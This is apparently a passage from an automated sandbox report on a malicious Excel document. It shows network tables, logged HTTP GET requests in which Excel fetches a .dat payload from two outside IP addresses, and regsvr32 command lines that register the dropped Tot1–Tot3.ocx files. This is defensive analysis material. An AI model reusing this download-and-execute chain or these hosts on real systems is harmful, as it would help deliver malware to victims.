                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      12/02/21-20:54:54.090042TCP1201ATTACK-RESPONSES 403 Forbidden8049167190.14.37.101192.168.2.22
                                                                                                                                                      12/02/21-20:55:36.529819TCP1201ATTACK-RESPONSES 403 Forbidden8049170185.138.164.244192.168.2.22

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Dec 2, 2021 21:02:11.715744019 CET4976880192.168.2.4190.14.37.101
                                                                                                                                                      Dec 2, 2021 21:02:11.902852058 CET8049768190.14.37.101192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:02:11.902982950 CET4976880192.168.2.4190.14.37.101
                                                                                                                                                      Dec 2, 2021 21:02:11.903629065 CET4976880192.168.2.4190.14.37.101
                                                                                                                                                      Dec 2, 2021 21:02:12.090944052 CET8049768190.14.37.101192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:02:12.878776073 CET8049768190.14.37.101192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:02:12.878889084 CET4976880192.168.2.4190.14.37.101
                                                                                                                                                      Dec 2, 2021 21:02:12.883891106 CET4976980192.168.2.4185.81.114.236
                                                                                                                                                      Dec 2, 2021 21:02:15.885677099 CET4976980192.168.2.4185.81.114.236
                                                                                                                                                      Dec 2, 2021 21:02:21.886257887 CET4976980192.168.2.4185.81.114.236
                                                                                                                                                      Dec 2, 2021 21:02:33.900758028 CET4977080192.168.2.4185.138.164.244
                                                                                                                                                      Dec 2, 2021 21:02:33.936877966 CET8049770185.138.164.244192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:02:33.936980963 CET4977080192.168.2.4185.138.164.244
                                                                                                                                                      Dec 2, 2021 21:02:33.937803030 CET4977080192.168.2.4185.138.164.244
                                                                                                                                                      Dec 2, 2021 21:02:33.973692894 CET8049770185.138.164.244192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:02:34.138546944 CET8049770185.138.164.244192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:02:34.138638020 CET4977080192.168.2.4185.138.164.244
                                                                                                                                                      Dec 2, 2021 21:03:17.940834999 CET8049768190.14.37.101192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:03:17.943676949 CET4976880192.168.2.4190.14.37.101
                                                                                                                                                      Dec 2, 2021 21:03:39.146488905 CET8049770185.138.164.244192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:03:39.146641016 CET4977080192.168.2.4185.138.164.244
                                                                                                                                                      Dec 2, 2021 21:03:58.615490913 CET4977080192.168.2.4185.138.164.244
                                                                                                                                                      Dec 2, 2021 21:03:58.615824938 CET4976880192.168.2.4190.14.37.101
                                                                                                                                                      Dec 2, 2021 21:03:58.651915073 CET8049770185.138.164.244192.168.2.4
                                                                                                                                                      Dec 2, 2021 21:03:58.802958012 CET8049768190.14.37.101192.168.2.4

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 190.14.37.101
                                                                                                                                                      • 185.138.164.244

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.449768190.14.37.10180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Dec 2, 2021 21:02:11.903629065 CET1286OUTGET /44532.8765170139.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 190.14.37.101
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 2, 2021 21:02:12.878776073 CET1287INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 02 Dec 2021 20:02:12 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.449770185.138.164.24480C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Dec 2, 2021 21:02:33.937803030 CET1472OUTGET /44532.8765170139.dat HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: 185.138.164.244
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Dec 2, 2021 21:02:34.138546944 CET1473INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 02 Dec 2021 20:02:34 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 6316 Parent PID: 800

                                                                                                                                                      General

                                                                                                                                                      Start time:21:02:06
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                      Imagebase:0xa80000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 1740 Parent PID: 6316

                                                                                                                                                      General

                                                                                                                                                      Start time:21:02:33
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32.exe ..\Tot1.ocx
                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6344 Parent PID: 6316

                                                                                                                                                      General

                                                                                                                                                      Start time:21:02:34
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32.exe ..\Tot2.ocx
                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6736 Parent PID: 6316

                                                                                                                                                      General

                                                                                                                                                      Start time:21:02:36
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32.exe ..\Tot3.ocx
                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >